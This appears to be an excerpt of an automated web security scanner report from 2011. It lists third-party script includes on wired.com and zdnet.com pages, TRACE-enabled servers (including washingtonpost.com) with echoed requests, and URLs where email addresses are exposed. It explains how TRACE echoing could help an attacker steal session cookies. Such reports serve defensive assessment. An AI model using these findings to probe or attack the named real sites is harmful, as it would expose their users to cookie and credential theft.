GET /threatlevel/tag/wikileaks/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:07:17 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:43:45 GMT
Date: Wed, 12 Jan 2011 15:35:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.215. http://www.wired.com/topics/Claude_Cassirer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/topics/Claude_Cassirer

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /topics/Claude_Cassirer HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=600
Expires: Wed, 12 Jan 2011 15:51:24 GMT
Date: Wed, 12 Jan 2011 15:41:24 GMT
Content-Length: 32354
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.216. http://www.wired.com/topics/Florida previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/topics/Florida

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /topics/Florida HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

16.217. http://www.wired.com/topics/Spain previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/topics/Spain

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /topics/Spain HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

16.218. http://www.wired.com/topics/United_States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/topics/United_States

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /topics/United_States HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

16.219. http://www.wired.com/topics/Western_Europe previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/topics/Western_Europe

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /topics/Western_Europe HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

16.220. http://www.wired.com/topics/WikiLeaks.org previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/topics/WikiLeaks.org

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /topics/WikiLeaks.org HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

16.221. http://www.wired.com/underwire/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/underwire/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /underwire/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 05:02:36 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=337
Expires: Wed, 12 Jan 2011 05:10:05 GMT
Date: Wed, 12 Jan 2011 05:04:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 138529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.222. http://www.wired.com/video/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/video/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/APIModules_all.js
http://admin.brightcove.com/js/BrightcoveExperiences.js
http://w.sharethis.com/widget/?tabs=web%2Cemail&charset=utf-8&services=facebook%2Cmyspace%2Cdelicious%2Ctechnorati%2Cpropeller%2Cmixx%2Cnewsvine%2Cgoogle_bmarks%2Cyahoo_myweb%2Cwindows_live%2Ctailrank%2Cmagnolia%2Cfurl%2Cblinklist%2Cblogmarks&amp style=default&publisher=0ec71848-688b-4d92-957d-d8ba67ad2647&headerbg=%23e7e7e7&inactivebg=%23f1f1f1&inactivefg=%237e7e7e&linkfg=%23007ca5
http://www.google-analytics.com/urchin.js

Request

GET /video/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private, max-age=266
Expires: Wed, 12 Jan 2011 05:09:34 GMT
Date: Wed, 12 Jan 2011 05:05:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107714

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
</div>

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/APIModules_all.js"></script>
...[SNIP]...
<div class='bc_shareThisContainer'>
<script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cemail&charset=utf-8&services=facebook%2Cmyspace%2Cdelicious%2Ctechnorati%2Cpropeller%2Cmixx%2Cnewsvine%2Cgoogle_bmarks%2Cyahoo_myweb%2Cwindows_live%2Ctailrank%2Cmagnolia%2Cfurl%2Cblinklist%2Cblogmarks&amp style=default&publisher=0ec71848-688b-4d92-957d-d8ba67ad2647&headerbg=%23e7e7e7&inactivebg=%23f1f1f1&inactivefg=%237e7e7e&linkfg=%23007ca5"></script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

16.223. http://www.wired.com/video/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/video/search/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/APIModules_all.js
http://admin.brightcove.com/js/BrightcoveExperiences.js
http://w.sharethis.com/widget/?tabs=web%2Cemail&charset=utf-8&services=facebook%2Cmyspace%2Cdelicious%2Ctechnorati%2Cpropeller%2Cmixx%2Cnewsvine%2Cgoogle_bmarks%2Cyahoo_myweb%2Cwindows_live%2Ctailrank%2Cmagnolia%2Cfurl%2Cblinklist%2Cblogmarks&amp style=default&publisher=0ec71848-688b-4d92-957d-d8ba67ad2647&headerbg=%23e7e7e7&inactivebg=%23f1f1f1&inactivefg=%237e7e7e&linkfg=%23007ca5
http://www.google-analytics.com/urchin.js

Request

GET /video/search/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private, max-age=285
Expires: Wed, 12 Jan 2011 05:10:01 GMT
Date: Wed, 12 Jan 2011 05:05:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
</div>

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/APIModules_all.js"></script>
...[SNIP]...
<div class='bc_shareThisContainer'>
<script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cemail&charset=utf-8&services=facebook%2Cmyspace%2Cdelicious%2Ctechnorati%2Cpropeller%2Cmixx%2Cnewsvine%2Cgoogle_bmarks%2Cyahoo_myweb%2Cwindows_live%2Ctailrank%2Cmagnolia%2Cfurl%2Cblinklist%2Cblogmarks&amp style=default&publisher=0ec71848-688b-4d92-957d-d8ba67ad2647&headerbg=%23e7e7e7&inactivebg=%23f1f1f1&inactivefg=%237e7e7e&linkfg=%23007ca5"></script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

16.224. http://www.wired.com/wiredscience/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/wiredscience/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://www.google-analytics.com/urchin.js

Request

GET /wiredscience/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 04:27:14 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=305
Expires: Wed, 12 Jan 2011 05:10:25 GMT
Date: Wed, 12 Jan 2011 05:05:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 102705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.225. http://www.zdnet.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.zdnet.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/N5823.CBSi/B5020397.16;abr=!ie;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18117&sg=478730&o=10%253A&h=cn&p=&b=2&l=&site=2&pt=2000&nd=10&pid=&cid=0&pp=100&e=&rqid=01c13-ad-e6:4D2D32294EFBF&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=L4wloQoPOJAAAFPfax4AAABD&t=2011.01.12.05.08.03&event=58/;ord=2011.01.12.05.08.03?
http://ad.doubleclick.net/adj/N5823.CBSi/B5020397.17;abr=!ie;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8142&sg=478728&o=10%253A&h=cn&p=&b=2&l=&site=2&pt=2000&nd=10&pid=&cid=0&pp=200&e=&rqid=00c13-ad-e2:4D2CD2E77397FF&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=L4wloQoPOJAAAFPfax4AAABD&t=2011.01.12.05.08.03&event=58/;ord=2011.01.12.05.08.03?
http://ad.doubleclick.net/adj/N5823.CBSi/B5020397.17;abr=!ie;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8779&sg=478727&o=10%253A&h=cn&p=&b=2&l=&site=2&pt=2000&nd=10&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4D2CBD628F10AB&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=L4wloQoPOJAAAFPfax4AAABD&t=2011.01.12.05.08.03&event=58/;ord=2011.01.12.05.08.03?
http://dw.com.com/js/dw.js
http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-zdnet.js
http://offers-service.cbsinteractive.com/offers/script.sc?offerId=74
http://secure-au.imrworldwide.com/v53.js

Request

GET / HTTP/1.1
Host: www.zdnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 05:08:03 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22tx%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%224%22%2C%22metrocode%22%3A%22623%22%2C%22longittude%22%3A%22-96.799%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22dallas%22%2C%22cityconf%22%3A%223%22%2C%22citycode%22%3A%2277%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2244%22%2C%22latitude%22%3A%2232.787%22%7D; expires=Thu, 12-Jan-2012 05:08:03 GMT; path=/; domain=.zdnet.com
Keep-Alive: timeout=15, max=999
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 117305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
<link rel="image_src" href="http://i.zdnet.com/images/201004/logo-zdnet-130x110.jpg" />

<script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...
POJAAAFPfax4AAABD&t=2011.01.12.05.08.03&event=58/;ord=2011.01.12.05.08.03?" width="728" height="90" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5823.CBSi/B5020397.16;abr=!ie;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18117&sg=478730&o=10%253A&h=cn&p=&b=2&l=&site=2&pt=2000&nd=10&pid=&cid=0&pp=100&e=&rqid=01c13-ad-e6:4D2D32294EFBF&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=L4wloQoPOJAAAFPfax4AAABD&t=2011.01.12.05.08.03&event=58/;ord=2011.01.12.05.08.03?">
</SCRIPT>
...[SNIP]...
OJAAAFPfax4AAABD&t=2011.01.12.05.08.03&event=58/;ord=2011.01.12.05.08.03?" width="300" height="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5823.CBSi/B5020397.17;abr=!ie;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8779&sg=478727&o=10%253A&h=cn&p=&b=2&l=&site=2&pt=2000&nd=10&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4D2CBD628F10AB&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=L4wloQoPOJAAAFPfax4AAABD&t=2011.01.12.05.08.03&event=58/;ord=2011.01.12.05.08.03?">
</SCRIPT>
...[SNIP]...
OJAAAFPfax4AAABD&t=2011.01.12.05.08.03&event=58/;ord=2011.01.12.05.08.03?" width="300" height="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5823.CBSi/B5020397.17;abr=!ie;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8142&sg=478728&o=10%253A&h=cn&p=&b=2&l=&site=2&pt=2000&nd=10&pid=&cid=0&pp=200&e=&rqid=00c13-ad-e2:4D2CD2E77397FF&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=L4wloQoPOJAAAFPfax4AAABD&t=2011.01.12.05.08.03&event=58/;ord=2011.01.12.05.08.03?">
</SCRIPT>
...[SNIP]...

<script type="text/javascript" src="http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-zdnet.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://secure-au.imrworldwide.com/v53.js"></script>
...[SNIP]...


<script type="text/javascript"
src="http://offers-service.cbsinteractive.com/offers/script.sc?offerId=74"></script>
...[SNIP]...

17. TRACE method is enabled previous next
There are 4 instances of this issue:

http://ad.crwdcntrl.net/
http://www.sentinelinvestments.com/
http://www.washingtonpost.com/
http://www.websitedescription.com/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

17.1. http://ad.crwdcntrl.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.crwdcntrl.net
Path:	/

Request

TRACE / HTTP/1.0
Host: ad.crwdcntrl.net
Cookie: 3333e9676e676ab8

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:00:25 GMT
Server: Apache/2.2.8 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: ad.crwdcntrl.net
Cookie: 3333e9676e676ab8

17.2. http://www.sentinelinvestments.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sentinelinvestments.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.sentinelinvestments.com
Cookie: 7e350a690c2da101

Response

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 16:03:01 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.sentinelinvestments.com
Cookie: 7e350a690c2da101

17.3. http://www.washingtonpost.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.washingtonpost.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.washingtonpost.com
Cookie: 1b0162093a8127fe

Response

HTTP/1.1 200 OK
Server: Web Server
Date: Wed, 12 Jan 2011 15:26:41 GMT
Set-cookie: WPPREF=HP=0:VS=1; Expires=Wednesday, 12-January-2031 15:32:46 GMT; path=/; domain=.washingtonpost.com
Cache-control: no-cache
Expires: Wed, 12 Jan 2011 15:26:42 GMT
Content-type: message/http
Content-length: 134
Connection: close

TRACE / HTTP/1.0
Host: www.washingtonpost.com
Cookie: 1b0162093a8127fe
Connection: Keep-Alive
X-forwarded-for: 173.193.214.243

17.4. http://www.websitedescription.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.websitedescription.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.websitedescription.com
Cookie: 6b2ef2d6998ef7cc

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 15:26:54 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.websitedescription.com
Cookie: 6b2ef2d6998ef7cc

18. Email addresses disclosed previous next
There are 140 instances of this issue:

http://dean.edwards.name/weblog/2006/03/base/
http://landesm.gfi.com/event-log-analysis-sm/
http://lists.arin.net/mailman/listinfo/arin-whoisrws
http://www.ccmaine.net/ContactUs
http://www.pwc.com/WTS/WebTrendsServlet.js
http://www.pwc.com/en_GX/webadmin/assets/script/activatedlogo.js
http://www.sentinelinvestments.com/inc/js/jquery.cookie.js
http://www.sentinelinvestments.com/inc/js/jquery.hoverIntent.minified.js
http://www.sentinelinvestments.com/inc/js/jquery.tablesorter.js
http://www.sentinelinvestments.com/inc/js/lightbox/scripts/prototype.js
http://www.tukui.org/v2/tukloadx-mac-os-auto-update/
http://www.tukui.org/v2/tukui/contact/
http://www.wired.com/about/faq/
http://www.wired.com/about/press/
http://www.wired.com/about/privacy-policy/
http://www.wired.com/about/user-agreement/
http://www.wired.com/autopia/
http://www.wired.com/autopia/2011/01/study-renewable-fuel-mandate-cant-be-met-with-ethanol/
http://www.wired.com/dangerroom/
http://www.wired.com/dangerroom/2011/01/china-is-loving-u-s-s-stealth-jet-missile-freakouts/
http://www.wired.com/epicenter/
http://www.wired.com/epicenter/2011/01/amazon-prepares-to-take-on-illinois-in-sales-tax-dispute/
http://www.wired.com/epicenter/2011/01/metropcs-net-neutrality/
http://www.wired.com/gadgetlab/
http://www.wired.com/gamelife/
http://www.wired.com/geekdad/
http://www.wired.com/geekdad/2011/01/beans-soda-same-difference-a-jelly-belly-experiment/
http://www.wired.com/js/videos/MobileCompatibility.js
http://www.wired.com/magazine/decode/
http://www.wired.com/playbook/
http://www.wired.com/rawfile/
http://www.wired.com/thisdayintech/
http://www.wired.com/threatlevel/
http://www.wired.com/threatlevel/2006/04/reporter_vs_sub/
http://www.wired.com/threatlevel/2010/12/hacking-the-hacker-stereotypes/
http://www.wired.com/threatlevel/2010/12/transcending-the-human-diy-style/
http://www.wired.com/threatlevel/2010/12/wiki-style-mapping-heads-to-sea/
http://www.wired.com/threatlevel/2011/01/birgitta-jonsdottir/
http://www.wired.com/threatlevel/2011/01/codebreakers-death/
http://www.wired.com/threatlevel/2011/01/dubai-assassination/
http://www.wired.com/threatlevel/2011/01/secret-tanning-camera/
http://www.wired.com/threatlevel/2011/01/vf-wikieaks/
http://www.wired.com/threatlevel/2011/01/video-poker/
http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
